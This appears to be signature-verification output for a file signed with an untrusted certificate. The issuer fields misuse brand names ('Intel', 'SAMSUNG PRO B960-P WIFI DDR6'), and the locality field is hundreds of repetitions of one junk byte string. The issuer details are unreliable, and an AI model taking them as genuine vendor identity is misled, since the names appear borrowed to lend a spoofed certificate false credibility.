Signature Issuer:	C=6G Bluetooth, L="\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7", OU=Universal Gen Core Pentium, O=" Intel", CN=SAMSUNG PRO B960-P WIFI DDR6
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	31/01/2024 10:51:46 06/06/2025 01:00:00
